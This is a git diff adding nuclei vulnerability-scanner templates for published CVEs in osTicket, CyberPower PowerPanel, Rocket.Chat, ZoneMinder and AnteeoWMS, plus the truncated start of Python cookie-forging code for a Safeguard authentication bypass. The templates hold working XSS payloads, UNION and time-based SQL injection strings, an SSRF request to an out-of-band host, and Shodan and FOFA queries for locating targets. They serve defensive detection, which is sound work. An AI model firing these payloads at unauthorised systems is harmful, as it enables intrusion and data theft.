@ -0,0 +1,73 @@
id: CVE-2018-7196
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /scp/index.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "sort" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7196
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7196
cwe-id: CWE-79
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/index.php?sort="><script>alert(document.domain);</script>&dir=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><script>alert(document.domain);</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402202a3bfee629128ded92342fc0366e48e742ede36203e4d9989eb86598ea466e1502200b83765e3c103aa1bb774995dbad2ffcd07ab46b6a05c27e26c939dd4f48a023:922c64590222798bb761d5b6d8e72950

4
http/cves/2019/CVE-2019-7139.yaml
View File

@ -55,7 +55,7 @@ http:
- raw:
- |
@timeout: 20s
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((6)))a)%3d1+--+- HTTP/1.1
GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1
Host: {{Hostname}}
- |
@ -72,7 +72,7 @@ http:
- type: dsl
name: time-based
dsl:
- 'duration_1>=6'
- 'duration_1>=8'
- 'contains(content_type_1, "application/json")'
condition: and

68
http/cves/2021/CVE-2021-45811.yaml Normal file
View File

@ -0,0 +1,68 @@
id: CVE-2021-45811
info:
name: osTicket 1.15.x - SQL Injection
author: ritikchaddha
severity: medium
description: |
A SQL injection vulnerability in the "Search" functionality of "tickets.php" page in osTicket 1.15.x allows authenticated attackers to execute arbitrary SQL commands via the "keywords" and "topic_id" URL parameters combination.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://members.backbox.org/osticket-sql-injection/
- https://nvd.nist.gov/vuln/detail/CVE-2021-45811
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2021-45811
cwe-id: CWE-89
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2021,osticket,sqli,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /tickets.php?a=search&keywords=text'+:1&topic_id=topic_id_val HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body_2, "FROM (SELECT", "topic_id_val\'\' IN NATURAL", "ORDER BY relevance")
# digest: 490a0046304402205cc02f7b820e5331fe9be93e73d2a1386287fc72bdc45ff952a4c37b8bda3866022030d6880a65c877c244a1b41bf61374798ab06cfb371593bd22ee05a96189a8bc:922c64590222798bb761d5b6d8e72950

81
http/cves/2023/CVE-2023-1315.yaml Normal file
View File

@ -0,0 +1,81 @@
id: CVE-2023-1315
info:
name: osTicket < v1.16.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://huntr.com/bounties/70a7fd8c-7e6f-4a43-9f8c-163b8967b16e
- https://nvd.nist.gov/vuln/detail/CVE-2023-1315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-1315
cwe-id: CWE-79
epss-score: 0.00058
epss-percentile: 0.25661
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2023,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- scp/ajax.php/tickets/search?parent_id=1"><svg/x=">"/onload=confirm()//
- scp/ajax.php/tickets/search/create?pid=adhoc%2cpdXBTnfSg0riebm%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etgghb
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains_any(body, "><svg/x=\">\"/onload=confirm()//", "\"><script>alert(document.domain)</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022033ef9b3e74fc7c32bd85874ea3ea3e73c2ee3a6e528bde69b2df12427e729063022100ce09ff3714dbd35320db650ebeda56efc1d2fa37dd7983704be303b3f52df62a:922c64590222798bb761d5b6d8e72950

75
http/cves/2023/CVE-2023-1317.yaml Normal file
View File

@ -0,0 +1,75 @@
id: CVE-2023-1317
info:
name: osTicket < v1.16.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository osticket/osticket prior to v1.16.6.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://huntr.com/bounties/c3e27af2-358b-490b-9baf-e451663e4e5f
- https://nvd.nist.gov/vuln/detail/CVE-2023-1317
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-1317
cwe-id: CWE-79
epss-score: 0.00058
epss-percentile: 0.25661
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2023,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/ajax.php/orgs/search?q=osTicket%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "<img src=a onerror=alert(document.domain)>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502204f90509b43c6ab32f6245897168bacb72fe35e4e8194123cdffa557cac198879022100e38c5c169b786f0b9c63fbe1bb533a75f9a69a78a82ff9cf33a52825eda0daa6:922c64590222798bb761d5b6d8e72950

84
http/cves/2023/CVE-2023-1318.yaml Normal file
View File

@ -0,0 +1,84 @@
id: CVE-2023-1318
info:
name: osTicket < v1.16.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Generic in GitHub repository osticket/osticket prior to v1.16.6.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://huntr.com/bounties/e58b38e0-4897-4bb0-84e8-a7ad8efab338
- https://nvd.nist.gov/vuln/detail/CVE-2023-1318
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-1318
cwe-id: CWE-79
epss-score: 0.00058
epss-percentile: 0.25661
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 7
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2023,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3edhvmt&condition=1001
- scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Emui2bt(document.domain)%3C%2fscript%3Edhvmt
- scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euoq07
- scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(document.domain)%3c/script%3em7dak
- scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(document.domain)%3c/script%3ez2p1d
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(body, "><script>alert(document.domain)</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4b0a0048304602210083866ca1940448c63ff84d38902496a01263ad7d0eda3ea2d1b63c1fcf617724022100c41e3708e1f0eb14276a6f0a5e77a024700eece54fbe5d8418892d3e7f34c3d2:922c64590222798bb761d5b6d8e72950

51
http/cves/2024/CVE-2024-32735.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2024-32735
info:
name: CyberPower - Missing Authentication
author: DhiyaneshDK
severity: critical
description: |
An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
impact: |
An unauthenticated remote attacker can access the PDNU REST APIs, which may result in compromise of the application.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-32735
cwe-id: CWE-306
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,auth-bupass
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/devices"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"account":'
- '"passwd":'
- 'status":"success'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402207bfd65161266762c2af8d49a907f0133c98a0132d8901a964aef14c2ae62a7e402207fea26ab03d616e0f5a10e69a41f37f7b4398805e025f4dca3787053ce8730ab:922c64590222798bb761d5b6d8e72950

59
http/cves/2024/CVE-2024-32736.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2024-32736
info:
name: CyberPower < v2.8.3 - SQL Injection
author: DhiyaneshDk
severity: high
description: |
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .
impact: |
An unauthenticated remote attacker can leak sensitive information via the "query_utask_verbose" function within MCUDBHelper.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32736
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-32736
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,sqli
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--"
matchers-condition: and
matchers:
- type: regex
regex:
- '"code":"([0-9.]+)"'
- type: word
part: body
words:
- '"results":'
- '{"status":"finished'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"code":"([0-9.]+)"'
# digest: 490a004630440220471d727be0f332c5e331561df5516703428243450173cc483c4ef4ff72ce3389022005f4175fb431fa8affbe961db64e9b763ed5b351bcb0fc46a5f5fbf729aef997:922c64590222798bb761d5b6d8e72950

56
http/cves/2024/CVE-2024-32737.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2024-32737
info:
name: CyberPower - SQL Injection
author: DhiyaneshDk
severity: high
description: |
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
impact: |
An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32737
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-32737
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,sqli
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- ':"finished"'
- '"success":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"modifiedtime":"([0-9.]+)"'
# digest: 4a0a00473045022051cdfff72585a5fcc6ca9e3128c5983a113eed88a37cd983efda2e5e3c85945a0221009cdce70febb52d0a585c55563bee91fdfdfe2bcbbb156e165b76d2f55aed4885:922c64590222798bb761d5b6d8e72950

57
http/cves/2024/CVE-2024-32738.yaml Normal file
View File

@ -0,0 +1,57 @@
id: CVE-2024-32738
info:
name: CyberPower - SQL Injection
author: DhiyaneshDk
severity: high
description: |
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
impact: |
An unauthenticated remote attacker can leak sensitive information via the "query_ptask_lean" function within MCUDBHelper.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32738
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-32738
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,sqli
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- ':"finished"'
- '"success":'
- 'modifiedtime":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"modifiedtime":"([0-9.]+)"'
# digest: 4a0a004730450220584dc71a6ba20c795ec2d94378d76a0b8883b2aa46a3d2f22fa00d04c5ec0dc0022100cb0c75fdba525d1fea9de7c23b08c5904bf843f8287329770611cc1257a0908c:922c64590222798bb761d5b6d8e72950

55
http/cves/2024/CVE-2024-32739.yaml Normal file
View File

@ -0,0 +1,55 @@
id: CVE-2024-32739
info:
name: CyberPower < v2.8.3 - SQL Injection
author: DhiyaneshDk
severity: high
description: |
A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
impact: |
An unauthenticated remote attacker can leak sensitive information via the "query_ptask_verbose" function within MCUDBHelper.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32739
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-32739
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,sqli
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"
matchers-condition: and
matchers:
- type: word
part: body
words:
- ':"finished"'
- '"results":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: regex
group: 1
regex:
- '"code":"([0-9.]+)"'
# digest: 490a0046304402200ffa17a1de5c623b46e49af72f6055b5228e418de21534a4561aff6f028389320220506cabd2ac593cce3589ceb0527c52e358373d3ac6e9970d4ba83c715077b378:922c64590222798bb761d5b6d8e72950

61
http/cves/2024/CVE-2024-39713.yaml Normal file
View File

@ -0,0 +1,61 @@
id: CVE-2024-39713
info:
name: Rocket.Chat - Server-Side Request Forgery (SSRF)
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-39713
- https://hackerone.com/reports/1886954
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2024-39713
cwe-id: CWE-918
epss-score: 0.00087
epss-percentile: 0.37765
cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
metadata:
vendor: rocket.chat
product: rocket.chat
shodan-query: http.title:"rocket.chat"
fofa-query: title="rocket.chat"
google-query: intitle:"rocket.chat"
tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat
http:
- raw:
- |
POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"From": "5551123456782",
"To": "5551987654323",
"Body": "SMS message",
"NumMedia": 1,
"MediaUrl0":"http://{{interactsh-url}}",
"MediaContentType0":"application/json"
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<Response></Response>"
- type: word
part: content_type
words:
- "text/xml"
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# digest: 4b0a00483046022100c1eb24244de8eab33c5bdf64e1b64fbb73f9677cadb7ce7ed7f9a0e316366d4802210091561db9f520bb98f06c8c192535d56115d598d5aba8036cfc05c3390521ab11:922c64590222798bb761d5b6d8e72950

44
http/cves/2024/CVE-2024-43360.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2024-43360
info:
name: ZoneMinder - SQL Injection
author: s4e-io
severity: critical
description: |
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.
reference:
- https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj
- https://medium.com/techpioneers/cve-2024-43360-in-depth-analysis-and-implications-for-security-75ceccc746b4
- https://nvd.nist.gov/vuln/detail/CVE-2024-43360
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43360
cwe-id: CWE-89
epss-score: 0.00068
epss-percentile: 0.30893
cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zoneminder
product: zoneminder
fofa-query: icon_hash="-1218152116"
tags: cve,cve2024,zoneminder,sqli
http:
- raw:
- |
@timeout 20s
GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains_all(body,"result\":\"Ok", "rows\":[")'
- 'contains(content_type,"application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502205d3cb11ead82efea1de241689604996e5384562e31cadb210c21d6ac0ba3c690022100aff24a491bddee20365406460ed7e73170ef3768234692f60c76d4d87d6c51bc:922c64590222798bb761d5b6d8e72950

70
http/cves/2024/CVE-2024-44349.yaml Normal file
View File

@ -0,0 +1,70 @@
id: CVE-2024-44349
info:
name: AnteeoWMS < v4.7.34 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
reference:
- https://blog.cybergon.com/posts/cve-2024-44349/
- http://nvd.nist.gov/vuln/detail/CVE-2024-44349
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-44349
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
shodan-query: html:"ANTEEO"
tags: cve,cve2024,sqli,anteeowms
flow: http(1) && http(2)
http:
- raw:
- |
GET /default.aspx HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: viewstate
internal: true
group: 1
regex:
- 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'
- type: regex
part: body
name: viewstategen
internal: true
group: 1
regex:
- 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'
- type: regex
part: body
name: eventval
internal: true
group: 1
regex:
- 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'
- raw:
- |
POST /default.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Conversion failed when converting the nvarchar value &#39;Microsoft SQL Server'
# digest: 4a0a0047304502205a5bc70a82453302b02d97fb6b99d6a726505ee73b0815574e381ac7224c09050221008795017bf36669ad6b978ae76fd3ff3868aea81a23c27898e0436cc657b7e0e7:922c64590222798bb761d5b6d8e72950

318
http/cves/2024/CVE-2024-45488.yaml Normal file
View File

@ -0,0 +1,318 @@
id: CVE-2024-45488
info:
name: SafeGuard for Privileged Passwords < 7.5.2 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.
reference:
- https://blog.amberwolf.com/blog/2024/september/cve-2024-45488-one-identity-safeguard-for-privileged-passwords-authentication-bypass/
- https://blog.amberwolf.com/blog/2024/september/skeleton-cookie-breaking-into-safeguard-with-cve-2024-45488/
- https://gist.github.com/rxwx/c968b3324e74058208fe6e168fd8730f
- https://support.oneidentity.com/kb/4376740/safeguard-for-privileged-passwords-security-vulnerability-notification-defect-460620
- https://support.oneidentity.com/product-notification/noti-00001628
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-45488
epss-score: 0.00043
epss-percentile: 0.09691
metadata:
verified: true
max-request: 1
shodan-query: html:"Safeguard for Privileged Passwords"
tags: cve,cve2024,auth-bypass,safeguard
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
# pip install pycryptodome
from datetime import datetime, timedelta
from Crypto.Cipher import AES, DES3
from Crypto.Hash import HMAC, SHA1, SHA512, SHA256
from Crypto.Util.Padding import pad
from io import BytesIO
import argparse
import string
import base64
import uuid
import os
class DPAPIBlob:
CALG_3DES = 0x6603
CALG_AES_256 = 0x6610
CALG_SHA1 = 0x8004
CALG_SHA_256 = 0x800c
CALG_SHA_512 = 0x800e
def combine_bytes(self, *arrays):
return b''.join(arrays)
def hmac_sha512(self, key, data):
hmac = HMAC.new(key, digestmod=SHA512)
hmac.update(data)
return hmac.digest()
def derive_key_raw(self, hash_bytes, alg_hash):
ipad = bytearray([0x36] * 64)
opad = bytearray([0x5C] * 64)
for i in range(len(hash_bytes)):
ipad[i] ^= hash_bytes[i]
opad[i] ^= hash_bytes[i]
if alg_hash == self.CALG_SHA1:
sha1 = SHA1.new()
ipad_sha1bytes = sha1.new(ipad).digest()
opad_sha1bytes = sha1.new(opad).digest()
return self.combine_bytes(ipad_sha1bytes, opad_sha1bytes)
else:
raise Exception(f"Unsupported alg_hash: {alg_hash}")
def derive_key2(self, key, nonce, hash_algorithm, blob, entropy=None):
"""
Derive a key using the provided key, nonce, hash algorithm, blob, and optional entropy.
:param key: The base key material.
:param nonce: The nonce (salt) value.
:param hash_algorithm: The hash algorithm identifier (SHA1, SHA256, SHA512).
:param blob: The additional data to include in the key derivation.
:param entropy: Optional entropy to include in the key derivation.
:return: The derived key as a byte array.
"""
if hash_algorithm == self.CALG_SHA1:
hmac = HMAC.new(key, digestmod=SHA1)
elif hash_algorithm == self.CALG_SHA_256:
hmac = HMAC.new(key, digestmod=SHA256)
elif hash_algorithm == self.CALG_SHA_512:
hmac = HMAC.new(key, digestmod=SHA512)
else:
raise Exception(f"Unsupported hash algorithm: {hash_algorithm}")
key_material = bytearray()
key_material.extend(nonce)
if entropy is not None:
key_material.extend(entropy)
key_material.extend(blob)
hmac.update(key_material)
return hmac.digest()
def derive_key(self, key_bytes, salt_bytes, alg_hash, entropy=None):
